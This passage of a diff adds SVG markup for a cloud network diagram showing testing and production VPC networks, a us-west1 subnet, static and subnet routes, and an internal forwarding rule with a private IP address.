+                <path d="M 151.10691 -55.036415 C 151.10691 -55.036415 150.51528 -55.52143 149.33264 -55.52143 C 147.86157 -55.52143 147.28534 -54.733204 147.28534 -54.05098 C 147.28534 -53.26214 148.10438 -52.867717 148.83221 -52.867717 C 149.93906 -52.867717 151.10691 -53.82357 151.10691 -55.036415 M 145.82968 -54.08118 C 145.82968 -55.764245 147.34636 -56.67388 149.09044 -56.67388 C 150.09066 -56.67388 150.8185 -56.386075 151.10691 -56.21906 L 151.10691 -56.43168 C 151.10691 -57.55393 150.21207 -58.236155 149.16562 -58.236155 C 148.3928 -58.236155 147.64957 -57.85714 147.39134 -57.15951 L 146.1181 -57.705536 C 146.37571 -58.38776 147.27055 -59.51001 149.13543 -59.51001 C 150.9553 -59.51001 152.44117 -58.41796 152.44117 -56.32506 L 152.44117 -51.836676 L 151.10691 -51.836676 L 151.10691 -52.867717 L 151.0459 -52.867717 C 150.63669 -52.246504 149.87866 -51.59386 148.6048 -51.59386 C 147.08813 -51.59386 145.82968 -52.53431 145.82968 -54.08118" fill="#757575"/>
+              </g>
+              <g id="Graphic_834">
+                <title>Fill-13</title>
+                <path d="M 154.45783 -54.096215 L 154.45783 -57.993586 L 153.15377 -57.993586 L 153.15377 -59.26744 L 154.45783 -59.26744 L 154.45783 -61.541526 L 155.8531 -61.541526 L 155.8531 -59.26744 L 157.67236 -59.26744 L 157.67236 -57.993586 L 155.8531 -57.993586 L 155.8531 -54.202215 C 155.8531 -53.368385 156.2019 -52.98937 156.85394 -52.98937 C 157.11154 -52.98937 157.29335 -53.01957 157.49056 -53.11078 L 157.97619 -51.912725 C 157.65757 -51.77591 157.32416 -51.715514 156.85394 -51.715514 C 155.29166 -51.715514 154.45783 -52.57954 154.45783 -54.096215" fill="#757575"/>
+              </g>
+              <g id="Graphic_833">
+                <title>Fill-14</title>
+                <path d="M 163.52544 -62.55784 L 163.04043 -61.359784 C 162.85801 -61.450994 162.66142 -61.48119 162.4032 -61.48119 C 161.70556 -61.48119 161.16015 -61.07198 161.16015 -60.207335 L 161.16015 -59.267504 L 163.10083 -59.267504 L 163.10083 -57.99365 L 161.16015 -57.99365 L 161.16015 -51.836984 L 159.76489 -51.836984 L 159.76489 -57.99365 L 158.36962 -57.99365 L 158.36962 -59.267504 L 159.76489 -59.267504 L 159.76489 -60.25294 C 159.76489 -61.768996 160.84153 -62.75505 162.4032 -62.75505 C 162.87342 -62.75505 163.20683 -62.694036 163.52544 -62.55784" fill="#757575"/>
+              </g>
+              <g id="Graphic_832">
+                <title>Fill-15</title>
+                <path d="M 169.72735 -55.551936 C 169.72735 -57.25041 168.5447 -58.23585 167.30104 -58.23585 C 166.05738 -58.23585 164.87473 -57.25041 164.87473 -55.551936 C 164.87473 -53.85346 166.05738 -52.868025 167.30104 -52.868025 C 168.5447 -52.868025 169.72735 -53.85346 169.72735 -55.551936 M 171.1226 -55.551936 C 171.1226 -53.292643 169.53013 -51.59417 167.30104 -51.59417 C 165.07194 -51.59417 163.47947 -53.292643 163.47947 -55.551936 C 163.47947 -57.81123 165.07194 -59.5097 167.30104 -59.5097 C 169.53013 -59.5097 171.1226 -57.81123 171.1226 -55.551936" fill="#757575"/>
+              </g>
+              <g id="Graphic_831">
+                <title>Fill-16</title>
+                <path d="M 172.24418 -51.83674 L 172.24418 -59.26726 L 173.57844 -59.26726 L 173.57844 -58.0538 L 173.63945 -58.0538 C 173.94266 -58.903035 175.0193 -59.44906 175.79274 -59.44906 C 176.24756 -59.44906 176.55077 -59.388666 176.83919 -59.26726 L 176.30857 -57.963204 C 176.11136 -58.039006 175.86854 -58.069204 175.56533 -58.069204 C 174.60948 -58.069204 173.63945 -57.26557 173.63945 -55.900505 L 173.63945 -51.83674 Z" fill="#757575"/>
+              </g>
+              <g id="Graphic_830">
+                <title>Fill-17</title>
+                <path d="M 177.59685 -59.267196 L 178.9311 -59.267196 L 178.9311 -58.236155 L 178.9915 -58.236155 C 179.41673 -58.94858 180.40217 -59.51001 181.2816 -59.51001 C 182.47965 -59.51001 183.2531 -58.963985 183.6321 -58.08455 C 184.16272 -58.91838 185.07297 -59.51001 186.22542 -59.51001 C 188.0447 -59.51001 188.87914 -58.22075 188.87914 -56.386075 L 188.87914 -51.836676 L 187.48387 -51.836676 L 187.48387 -56.17346 C 187.48387 -57.72033 186.89224 -58.236155 185.831 -58.236155 C 184.69334 -58.236155 183.93531 -57.083707 183.93531 -55.94605 L 183.93531 -51.836676 L 182.54005 -51.836676 L 182.54005 -56.17346 C 182.54005 -57.72033 181.94904 -58.236155 180.88718 -58.236155 C 179.75014 -58.236155 178.9915 -57.083707 178.9915 -55.94605 L 178.9915 -51.836676 L 177.59685 -51.836676 Z" fill="#757575"/>
+              </g>
+              <g id="Graphic_829">
+                <title>Fill-18</title>
+                <path d="M 41.414485 -57.811475 C 41.414485 -61.23862 44.295607 -64.028535 47.722756 -64.028535 C 49.61844 -64.028535 50.9681 -63.285914 51.983735 -62.31527 L 50.7863 -61.117215 C 50.05785 -61.79944 49.072415 -62.33006 47.722756 -62.33006 C 45.22065 -62.33006 43.264566 -60.31358 43.264566 -57.811475 C 43.264566 -55.30937 45.22065 -53.292274 47.722756 -53.292274 C 49.34543 -53.292274 50.27047 -53.9443 50.861484 -54.53593 C 51.347115 -55.020947 51.665733 -55.71858 51.78714 -56.67443 L 47.722756 -56.67443 L 47.722756 -58.37229 L 53.439395 -58.37229 C 53.50041 -58.06908 53.530605 -57.705474 53.530605 -57.31105 C 53.530605 -56.0372 53.18179 -54.46013 52.05954 -53.33788 C 50.9681 -52.20084 49.572837 -51.594415 47.722756 -51.594415 C 44.295607 -51.594415 41.414485 -54.384327 41.414485 -57.811475" fill="#757575"/>
+              </g>
+              <g id="Graphic_828">
+                <title>Fill-19</title>
+                <path d="M 58.15088 -53.171236 C 56.93742 -53.171236 55.891585 -54.17208 55.891585 -55.59754 C 55.891585 -57.03841 56.93742 -58.023846 58.15088 -58.023846 C 59.36372 -58.023846 60.41017 -57.03841 60.41017 -55.59754 C 60.41017 -54.17208 59.36372 -53.171236 58.15088 -53.171236 M 58.15088 -59.60091 C 55.936573 -59.60091 54.1321 -57.917845 54.1321 -55.59754 C 54.1321 -53.292643 55.936573 -51.59417 58.15088 -51.59417 C 60.364566 -51.59417 62.16904 -53.292643 62.16904 -55.59754 C 62.16904 -57.917845 60.364566 -59.60091 58.15088 -59.60091" fill="#757575"/>
+              </g>
+              <g id="Graphic_827">
+                <title>Fill-20</title>
+                <path d="M 66.91719 -53.171236 C 65.70435 -53.171236 64.6579 -54.17208 64.6579 -55.59754 C 64.6579 -57.03841 65.70435 -58.023846 66.91719 -58.023846 C 68.13004 -58.023846 69.176486 -57.03841 69.176486 -55.59754 C 69.176486 -54.17208 68.13004 -53.171236 66.91719 -53.171236 M 66.91719 -59.60091 C 64.70289 -59.60091 62.89841 -57.917845 62.89841 -55.59754 C 62.89841 -53.292643 64.70289 -51.59417 66.91719 -51.59417 C 69.13088 -51.59417 70.93597 -53.292643 70.93597 -55.59754 C 70.93597 -57.917845 69.13088 -59.60091 66.91719 -59.60091" fill="#757575"/>
+              </g>
+              <g id="Graphic_826">
+                <title>Fill-21</title>
+                <path d="M 75.66058 -53.171236 C 74.44774 -53.171236 73.43149 -54.187486 73.43149 -55.582134 C 73.43149 -56.992805 74.44774 -58.023846 75.66058 -58.023846 C 76.85864 -58.023846 77.79847 -56.992805 77.79847 -55.582134 C 77.79847 -54.187486 76.85864 -53.171236 75.66058 -53.171236 Z M 77.67768 -59.3581 L 77.67768 -58.70607 L 77.61666 -58.70607 C 77.22224 -59.176295 76.464215 -59.60091 75.50898 -59.60091 C 73.50729 -59.60091 71.67262 -57.84204 71.67262 -55.582134 C 71.67262 -53.33825 73.50729 -51.59417 75.50898 -51.59417 C 76.464215 -51.59417 77.22224 -52.01879 77.61666 -52.5038 L 77.67768 -52.5038 L 77.67768 -51.92758 C 77.67768 -50.396115 76.85864 -49.577075 75.539175 -49.577075 C 74.46253 -49.577075 73.79509 -50.35051 73.5227 -51.002537 L 71.99062 -50.365917 C 72.43064 -49.30406 73.5985 -48.00001 75.539175 -48.00001 C 77.60187 -48.00001 79.34534 -49.21347 79.34534 -52.17039 L 79.34534 -59.3581 Z" fill="#757575"/>
+              </g>
+              <g id="Graphic_825">
+                <title>Fill-22</title>
+                <rect x="80.55892" y="-63.603854" width="1.7588712" height="11.767302" fill="#757575"/>
+              </g>
+              <g id="Graphic_824">
+                <title>Fill-23</title>
+                <path d="M 87.00333 -58.054044 C 87.70096 -58.054044 88.29259 -57.70523 88.48919 -57.204806 L 84.91105 -55.71895 C 84.86544 -57.26582 86.10849 -58.054044 87.00333 -58.054044 M 87.14014 -53.171236 C 86.2453 -53.171236 85.60807 -53.58045 85.19885 -54.38408 L 90.55189 -56.598384 L 90.37008 -57.0532 C 90.03606 -57.94804 89.02042 -59.60091 86.94293 -59.60091 C 84.88024 -59.60091 83.16697 -57.97824 83.16697 -55.59754 C 83.16697 -53.35304 84.86544 -51.59417 87.14014 -51.59417 C 88.97482 -51.59417 90.03606 -52.71642 90.47608 -53.368446 L 89.11102 -54.27808 C 88.6562 -53.610645 88.03437 -53.171236 87.14014 -53.171236" fill="#757575"/>
+              </g>
+            </g>
+          </g>
+          <g id="Graphic_821">
+            <title>zone external - grey</title>
+            <path d="M 19.819209 -27.500012 L 972.6808 -27.500012 L 972.6808 834.9022 L 19.819209 834.9022 Z" stroke="#616161" stroke-linecap="round" stroke-linejoin="round" stroke-dasharray="1.0,3.0" stroke-width="1"/>
+            <text transform="translate(29.81921 -12.500012)" fill="#757575">
+              <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="0" y="9">Project</tspan>
+            </text>
+          </g>
+          <g id="Graphic_819">
+            <title>zone internal - blue</title>
+            <rect x="39.31921" y="16.999978" width="486.5593" height="681.1023" fill="#e1f6fe"/>
+            <rect x="39.31921" y="16.999978" width="486.5593" height="681.1023" stroke="white" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"/>
+            <text transform="translate(74.31921 31.99998)" fill="#757575">
+              <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="0" y="9">VPC network: testing</tspan>
+            </text>
+          </g>
+          <g id="Group_806">
+            <g id="Graphic_818">
+              <title>Fill-7</title>
+              <rect x="59.90292" y="38.01834" width=".4321469" height="1.6853725" fill="white"/>
+              <rect x="59.90292" y="38.01834" width=".4321469" height="1.6853725" stroke="black" stroke-linecap="round" stroke-linejoin="round" stroke-width="0"/>
+            </g>
+            <g id="Graphic_817">
+              <title>Fill-10</title>
+              <rect x="60.54034" y="37.37012" width="1.6637656" height=".4321468" fill="white"/>
+              <rect x="60.54034" y="37.37012" width="1.6637656" height=".4321468" stroke="black" stroke-linecap="round" stroke-linejoin="round" stroke-width="0"/>
+            </g>
+            <g id="Graphic_816">
+              <title>Fill-1</title>
+              <path d="M 67.983945 37.617943 L 64.10206 30.867438 C 63.790815 30.328484 63.22677 29.999975 62.64635 29.999975 L 54.882425 29.999975 C 54.260384 29.999975 53.71715 30.36464 53.42657 30.866995 L 49.54468 37.60407 C 49.233735 38.142877 49.25469 38.788826 49.54424 39.29177 L 53.426274 46.07312 C 53.73737 46.611926 54.30156 46.971426 54.88198 46.971426 L 62.64576 46.971426 C 63.268094 46.971426 63.81118 46.57931 64.10176 46.076957 L 67.98365 39.326157 C 68.29474 38.7872 68.27364 38.12074 67.983945 37.617943" fill="#4285f4"/>
+            </g>
+            <g id="Graphic_815">
+              <title>Fill-4</title>
+              <path d="M 62.25223 34.98843 L 59.166965 36.471883 L 57.691186 34.996105 L 55.280206 37.4183 L 56.885706 39.0238 L 55.2777 41.972257 L 60.2769 46.971456 L 62.64582 46.971456 C 63.26815 46.971456 63.81124 46.57934 64.10182 46.076986 L 67.47471 40.210915 Z" fill="black" fill-opacity=".07"/>
+            </g>
+            <g id="Graphic_814">
+              <title>Fill-7</title>
+              <rect x="56.25537" y="37.08368" width=".7378893" height="2.8777677" fill="white"/>
+            </g>
+            <g id="Graphic_813">
+              <title>Fill-9</title>
+              <rect x="60.53513" y="36.733185" width=".7378893" height="3.220886" fill="white"/>
+            </g>
+            <g id="Graphic_812">
+              <title>Fill-10</title>
+              <rect x="57.34376" y="35.97685" width="2.840874" height=".7378892" fill="white"/>
+            </g>
+            <g id="Graphic_811">
+              <title>Fill-11</title>
+              <rect x="57.34376" y="40.256605" width="2.840874" height=".7378892" fill="white"/>
+            </g>
+            <g id="Graphic_810">
+              <title>Fill-12</title>
+              <path d="M 55.36996 34.943862 L 57.58363 34.943862 C 57.665094 34.943862 57.73121 35.009977 57.73121 35.09144 L 57.73121 37.305108 C 57.73121 37.38657 57.665094 37.452685 57.58363 37.452685 L 55.36996 37.452685 C 55.2885 37.452685 55.222385 37.38657 55.222385 37.305108 L 55.222385 35.09144 C 55.222385 35.009977 55.2885 34.943862 55.36996 34.943862" fill="white"/>
+            </g>
+            <g id="Graphic_809">
+              <title>Fill-13</title>
+              <path d="M 59.94486 34.943862 L 62.15853 34.943862 C 62.23999 34.943862 62.30611 35.009977 62.30611 35.09144 L 62.30611 37.305108 C 62.30611 37.38657 62.23999 37.452685 62.15853 37.452685 L 59.94486 37.452685 C 59.8634 37.452685 59.797284 37.38657 59.797284 37.305108 L 59.797284 35.09144 C 59.797284 35.009977 59.8634 34.943862 59.94486 34.943862" fill="white"/>
+            </g>
+            <g id="Graphic_808">
+              <title>Fill-14</title>
+              <path d="M 55.36996 39.51876 L 57.58363 39.51876 C 57.665094 39.51876 57.73121 39.584875 57.73121 39.66634 L 57.73121 41.880006 C 57.73121 41.96147 57.665094 42.027583 57.58363 42.027583 L 55.36996 42.027583 C 55.2885 42.027583 55.222385 41.96147 55.222385 41.880006 L 55.222385 39.66634 C 55.222385 39.584875 55.2885 39.51876 55.36996 39.51876" fill="white"/>
+            </g>
+            <g id="Graphic_807">
+              <title>Fill-15</title>
+              <path d="M 59.94486 39.51876 L 62.15853 39.51876 C 62.23999 39.51876 62.30611 39.584875 62.30611 39.66634 L 62.30611 41.880006 C 62.30611 41.96147 62.23999 42.027583 62.15853 42.027583 L 59.94486 42.027583 C 59.8634 42.027583 59.797284 41.96147 59.797284 41.880006 L 59.797284 39.66634 C 59.797284 39.584875 59.8634 39.51876 59.94486 39.51876" fill="white"/>
+            </g>
+          </g>
+          <g id="Graphic_805">
+            <title>zone internal - green</title>
+            <rect x="61.11921" y="251.84735" width="445.9849" height="426.2549" fill="#e2f3ec"/>
+            <rect x="61.11921" y="251.84735" width="445.9849" height="426.2549" stroke="white" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"/>
+            <text transform="translate(71.11921 266.84735)" fill="#757575">
+              <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="0" y="9">Region: us-west1</tspan>
+            </text>
+          </g>
+          <g id="Graphic_803">
+            <title>zone internal - purple</title>
+            <rect x="82.31921" y="346.4288" width="404.7849" height="311.67345" fill="#ede7f7"/>
+            <rect x="82.31921" y="346.4288" width="404.7849" height="311.67345" stroke="white" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"/>
+            <text transform="translate(92.31921 361.4288)" fill="#757575">
+              <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="0" y="9">Subnet: 10.30.1.0/24</tspan>
+            </text>
+          </g>
+          <g id="Group_850">
+            <g id="Graphic_859">
+              <rect x="103.51921" y="62.49998" width="162.48078" height="95.34739" fill="#fef8e0"/>
+              <rect x="103.51921" y="62.49998" width="162.48078" height="95.34739" stroke="#dfdfdf" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" clip-path="url(#inner_stroke_clip_path_4)"/>
+            </g>
+            <g id="Graphic_858">
+              <rect x="119.49902" y="112.4807" width="130.48078" height=".9999998" fill="#dfdfdf"/>
+            </g>
+            <g id="Graphic_857">
+              <text transform="translate(124.51921 121.39997)" fill="#757575">
+                <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="0" y="9">- Destination: 10.50.1.0/24</tspan>
+                <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="0" y="20">- Next-hop-ilb = fr-ilb</tspan>
+              </text>
+            </g>
+            <g id="Group_851">
+              <g id="Graphic_856">
+                <text transform="translate(163.45165 83.67368)" fill="#212121">
+                  <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="11">Static routes</tspan>
+                </text>
+              </g>
+              <g id="Group_852">
+                <title>Cloud Routes</title>
+                <g id="Graphic_855">
+                  <title>Fill-6</title>
+                  <path d="M 149.66446 96.92044 L 146.18269 96.92044 L 138.63028 87.47759 L 136.44718 87.47759 L 136.44718 84.38819 L 140.00002 84.38819 L 147.55211 93.83071 L 149.66446 93.83071 L 149.66446 91.38743 L 154.45165 95.37413 L 149.66446 99.36404 Z" fill="#666"/>
+                </g>
+                <g id="Graphic_854">
+                  <title>Fill-8</title>
+                  <path d="M 145.86744 89.62545 L 147.55205 87.51632 L 149.6644 87.51632 L 149.6644 89.95992 L 154.45159 85.97322 L 149.6644 81.98331 L 149.6644 84.42659 L 146.18262 84.42659 L 143.94485 87.22365 Z" fill="#666"/>
+                </g>
+                <g id="Graphic_853">
+                  <title>Fill-10</title>
+                  <path d="M 140.34717 91.72165 L 138.6304 93.86937 L 136.4473 93.86937 L 136.4473 96.9591 L 139.99983 96.9591 L 142.26655 94.12344 Z" fill="#666"/>
+                </g>
+              </g>
+            </g>
+          </g>
+          <g id="Group_861">
+            <g id="Graphic_870">
+              <rect x="286" y="62.49998" width="162.48078" height="95.34739" fill="#fef8e0"/>
+              <rect x="286" y="62.49998" width="162.48078" height="95.34739" stroke="#dfdfdf" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" clip-path="url(#inner_stroke_clip_path_5)"/>
+            </g>
+            <g id="Graphic_869">
+              <rect x="301.9798" y="112.4807" width="130.48078" height=".9999998" fill="#dfdfdf"/>
+            </g>
+            <g id="Graphic_868">
+              <text transform="translate(307 121.39997)" fill="#757575">
+                <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="0" y="9">- Destination: 10.30.1.0/24</tspan>
+                <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="0" y="20">- Next hop: virtual network</tspan>
+              </text>
+            </g>
+            <g id="Graphic_867">
+              <text transform="translate(342.68864 83.49999)" fill="#212121">
+                <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="11">Subnet routes</tspan>
+              </text>
+            </g>
+            <g id="Group_863">
+              <title>Cloud Routes</title>
+              <g id="Graphic_866">
+                <title>Fill-6</title>
+                <path d="M 328.90145 96.74675 L 325.4197 96.74675 L 317.86727 87.3039 L 315.68417 87.3039 L 315.68417 84.2145 L 319.237 84.2145 L 326.7891 93.65702 L 328.90145 93.65702 L 328.90145 91.21374 L 333.68864 95.20044 L 328.90145 99.19035 Z" fill="#666"/>
+              </g>
+              <g id="Graphic_865">
+                <title>Fill-8</title>
+                <path d="M 325.10444 89.45176 L 326.78904 87.34263 L 328.9014 87.34263 L 328.9014 89.78623 L 333.68858 85.79953 L 328.9014 81.80962 L 328.9014 84.2529 L 325.4196 84.2529 L 323.18184 87.04996 Z" fill="#666"/>
+              </g>
+              <g id="Graphic_864">
+                <title>Fill-10</title>
+                <path d="M 319.58416 91.54796 L 317.8674 93.69568 L 315.6843 93.69568 L 315.6843 96.7854 L 319.23682 96.7854 L 321.50354 93.94975 Z" fill="#666"/>
+              </g>
+            </g>
+          </g>
+          <g id="Group_879">
+            <g id="Graphic_874">
+              <rect x="192.6144" y="177.99996" width="162.48078" height="53.99999" fill="white"/>
+              <rect x="192.6144" y="177.99996" width="162.48078" height="53.99999" stroke="#dfdfdf" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" clip-path="url(#inner_stroke_clip_path_6)"/>
+            </g>
+            <g id="Graphic_873">
+              <title>Shuffle</title>
+              <path d="M 215.8111 201.8162 L 209.9836 195.99996 L 208.39736 197.5862 L 214.2136 203.40246 L 215.8111 201.8162 Z M 220.20986 195.99996 L 222.50486 198.29496 L 208.39736 212.4137 L 209.9836 213.99996 L 224.10236 199.89246 L 226.39736 202.18746 L 226.39736 195.99996 L 220.20986 195.99996 Z M 220.5811 206.5862 L 218.99486 208.17246 L 222.5161 211.6937 L 220.20986 213.99996 L 226.39736 213.99996 L 226.39736 207.81246 L 224.10236 210.10746 L 220.5811 206.5862 Z" fill="#616161"/>
+            </g>
+            <g id="Graphic_877">
+              <text transform="translate(234.0144 197.99996)" fill="#212121">
+                <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="11">VPC Routing</tspan>
+              </text>
+            </g>
+          </g>
+          <g id="Group_933">
+            <g id="Graphic_910">
+              <rect x="103.51921" y="466.4999" width="162.48078" height="99.39999" fill="white"/>
+              <rect x="103.51921" y="466.4999" width="162.48078" height="99.39999" stroke="#dfdfdf" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" clip-path="url(#inner_stroke_clip_path_7)"/>
+            </g>
+            <g id="Graphic_909">
+              <rect x="119.51921" y="519.69505" width="130.48078" height=".9999998" fill="#dfdfdf"/>
+            </g>
+            <g id="Graphic_908">
+              <text transform="translate(118.4 529.6)" fill="#757575">
+                <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x=".8841082" y="9">Forwarding rule name : fr-llb1</tspan>
+                <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="16.118483" y="20">IP address: 10.30.1.99</tspan>
+              </text>
+            </g>
+            <g id="Graphic_907">
+              <text transform="translate(119.51921 487.57105)" fill="#212121">
+                <tspan font-family="Roboto" font-size="12" font-weight="400" fill="#212121" x="0" y="11">Internal Forwarding Rule</tspan>
+              </text>
+            </g>
+          </g>
+          <g id="Group_935">
+            <g id="Graphic_947">
+              <title>Fill-7</title>
+              <rect x="60.21292" y="38.32834" width=".4321469" height="1.6853725" fill="white"/>
+              <rect x="60.21292" y="38.32834" width=".4321469" height="1.6853725" stroke="black" stroke-linecap="round" stroke-linejoin="round" stroke-width="0"/>
+            </g>
+            <g id="Graphic_946">
+              <title>Fill-10</title>
+              <rect x="60.85034" y="37.68012" width="1.6637656" height=".4321468" fill="white"/>
+              <rect x="60.85034" y="37.68012" width="1.6637656" height=".4321468" stroke="black" stroke-linecap="round" stroke-linejoin="round" stroke-width="0"/>
+            </g>
+            <g id="Graphic_945">
+              <title>Fill-1</title>
+              <path d="M 68.293945 37.927943 L 64.41206 31.177438 C 64.100815 30.638484 63.53677 30.309975 62.95635 30.309975 L 55.192425 30.309975 C 54.570384 30.309975 54.02715 30.67464 53.73657 31.176995 L 49.85468 37.91407 C 49.543735 38.452877 49.56469 39.098826 49.85424 39.60177 L 53.736274 46.38312 C 54.04737 46.921926 54.61156 47.281426 55.19198 47.281426 L 62.95576 47.281426 C 63.578094 47.281426 64.12118 46.88931 64.41176 46.386957 L 68.29365 39.636156 C 68.60474 39.0972 68.58364 38.43074 68.293945 37.927943" fill="#4285f4"/>
+            </g>
+            <g id="Graphic_944">
+              <title>Fill-4</title>
+              <path d="M 62.56223 35.29843 L 59.476965 36.781883 L 58.001186 35.306105 L 55.590206 37.7283 L 57.195706 39.3338 L 55.5877 42.282257 L 60.5869 47.281456 L 62.95582 47.281456 C 63.57815 47.281456 64.12124 46.88934 64.41182 46.386986 L 67.78471 40.520915 Z" fill="black" fill-opacity=".07"/>
+            </g>
+            <g id="Graphic_943">
+              <title>Fill-7</title>
+              <rect x="56.56537" y="37.39368" width=".7378893" height="2.8777677" fill="white"/>
+            </g>
+            <g id="Graphic_942">
+              <title>Fill-9</title>
+              <rect x="60.84513" y="37.043184" width=".7378893" height="3.220886" fill="white"/>
+            </g>
+            <g id="Graphic_941">
+              <title>Fill-10</title>
+              <rect x="57.65376" y="36.28685" width="2.840874" height=".7378892" fill="white"/>
+            </g>
+            <g id="Graphic_940">
+              <title>Fill-11</title>
+              <rect x="57.65376" y="40.566605" width="2.840874" height=".7378892" fill="white"/>
+            </g>
+            <g id="Graphic_939">
+              <title>Fill-12</title>
+              <path d="M 55.67996 35.253862 L 57.89363 35.253862 C 57.975094 35.253862 58.04121 35.319977 58.04121 35.40144 L 58.04121 37.615108 C 58.04121 37.69657 57.975094 37.762685 57.89363 37.762685 L 55.67996 37.762685 C 55.5985 37.762685 55.532385 37.69657 55.532385 37.615108 L 55.532385 35.40144 C 55.532385 35.319977 55.5985 35.253862 55.67996 35.253862" fill="white"/>
+            </g>
+            <g id="Graphic_938">
+              <title>Fill-13</title>
+              <path d="M 60.25486 35.253862 L 62.46853 35.253862 C 62.54999 35.253862 62.61611 35.319977 62.61611 35.40144 L 62.61611 37.615108 C 62.61611 37.69657 62.54999 37.762685 62.46853 37.762685 L 60.25486 37.762685 C 60.1734 37.762685 60.107284 37.69657 60.107284 37.615108 L 60.107284 35.40144 C 60.107284 35.319977 60.1734 35.253862 60.25486 35.253862" fill="white"/>
+            </g>
+            <g id="Graphic_937">
+              <title>Fill-14</title>
+              <path d="M 55.67996 39.82876 L 57.89363 39.82876 C 57.975094 39.82876 58.04121 39.894875 58.04121 39.97634 L 58.04121 42.190006 C 58.04121 42.27147 57.975094 42.337583 57.89363 42.337583 L 55.67996 42.337583 C 55.5985 42.337583 55.532385 42.27147 55.532385 42.190006 L 55.532385 39.97634 C 55.532385 39.894875 55.5985 39.82876 55.67996 39.82876" fill="white"/>
+            </g>
+            <g id="Graphic_936">
+              <title>Fill-15</title>
+              <path d="M 60.25486 39.82876 L 62.46853 39.82876 C 62.54999 39.82876 62.61611 39.894875 62.61611 39.97634 L 62.61611 42.190006 C 62.61611 42.27147 62.54999 42.337583 62.46853 42.337583 L 60.25486 42.337583 C 60.1734 42.337583 60.107284 42.27147 60.107284 42.190006 L 60.107284 39.97634 C 60.107284 39.894875 60.1734 39.82876 60.25486 39.82876" fill="white"/>
+            </g>
+          </g>
+          <g id="Graphic_962">
+            <title>zone internal - blue</title>
+            <rect x="608.9192" y="16.999978" width="343.76157" height="797.9023" fill="#e1f6fe"/>
+            <rect x="608.9192" y="16.999978" width="343.76157" height="797.9023" stroke="white" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"/>
+            <text transform="translate(643.9192 31.99998)" fill="#757575">
+              <tspan font-family="Roboto" font-size="10" font-weight="400" fill="#757575" x="0" y="9">VPC network:production</tspan>
+            </text>
+          </g>
+          <g id="Group_949">
+            <g id="Graphic_961">
+              <title>Fill-7</title>
+              <rect x="629.8129" y="38.32834" width=".4321469" height="1.6853725" fill="white"/>
+              <rect x="629.8129" y="38.32834" width=".4321469" height="1.6853725" stroke="black" stroke-linecap="round" stroke-linejoin="round" stroke-width="0"/>
+            </g>
+            <g id="Graphic_960">
+              <title>Fill-10</title>
+              <rect x="630.45035" y="37.68012" width="1.6637656" height=".4321468" fill="white"/>
+              <rect x="630.45035" y="37.68012" width="1.6637656" height=".4321468" stroke="black" stroke-linecap="round" stroke-linejoin="round" stroke-width="0"/>
+            </g>
+            <g id="Graphic_959">
+              <title>Fill-1</title>
+              <path d="M 637.89395 37.927943 L 634.0121 31.177438 C 633.7008 30.638484 633.1368 30.309975 632.55636 30.309975 L 624.7924 30.309975 C 624.1704 30.309975 623.62716 30.67464 623.3366 31.176995 L 619.4547 37.91407 C 619.14374 38.452877 619.1647 39.098826 619.45425 39.60177 L 623.3363 46.38312 C 623.6474 46.921926 624.2116 47.281426 624.792 47.281426 L 632.5558 47.281426 C 633.1781 47.281426 633.7212 46.88931 634.0118 46.386957 L 637.89366 39.636156 C 638.20475 39.0972 638.18365 38.43074 637.89395 37.927943" fill="#4285f4"/>
+            </g>
+            <g id="Graphic_958">
+              <title>Fill-4</title>
+              <path d="M 632.1622 35.29843 L 629.077 36.781883 L 627.6012 35.306105 L 625.1902 37.7283 L 626.7957 39.3338 L 625.1877 42.282257 L 630.1869 47.281456 L 632.5558 47.281456 C 633.17816 47.281456 633.72125 46.88934 634.0118 46.386986 L 637.3847 40.520915 Z" fill="black" fill-opacity=".07"/>
+            </g>
+            <g id="Graphic_957">
+              <title>Fill-7</title>
+              <rect x="626.1654" y="37.39368" width=".7378893" height="2.8777677" fill="white"/>
+            </g>
+            <g id="Graphic_956">
+              <title>Fill-9</title>
+              <rect x="630.4451" y="37.043184" width=".7378893" height="3.220886" fill="white"/>
+            </g>
+            <g id="Graphic_955">
+              <title>Fill-10</title>
+              <rect x="627.2538" y="36.28685" width="2.840874" height=".7378892" fill="white"/>
+            </g>
+            <g id="Graphic_954">
+              <title>Fill-11</title>
+              <rect x="627.2538" y="40.566605" width="2.840874" height=".7378892" fill="white"/>
+            </g>
+            <g id="Graphic_953">
+              <title>Fill-12</title>
+              <path d="M 625.28 35.253862 L 627.49364 35.253862 C 627.5751 35.253862 627.6412 35.319977 627.6412 35.40144 L 627.6412 37.615108 C 627.6412 37.69657 627.5751 37.762685 627.49364 37.762685 L 625.28 37.762685 C 625.1985 37.762685 625.1324 37.69657 625.1324 37.615108 L 625.1324 35.40144 C 625.1324 35.319977 625.1985 35.253862 625.28 35.253862" fill="white"/>
+            </g>
+            <g id="Graphic_952">
+              <title>Fill-13</title>
+              <path d="M 629.8549 35.253862 L 632.06854 35.253862 C 632.15 35.253862 632.2161 35.319977 632.2161 35.40144 L 632.2161 37.615108 C 632.2161 37.69657 632.15 37.762685 632.06854 37.762685 L 629.8549 37.762685 C 629.7734 37.762685 629.7073 37.69657 629.7073 37.615108 L 629.7073 35.40144 C 629.7073 35.319977 629.7734 35.253862 629.8549 35.253862" fill="white"/>
+            </g>
+            <g id="Graphic_951">
+              <title>Fill-14</title>
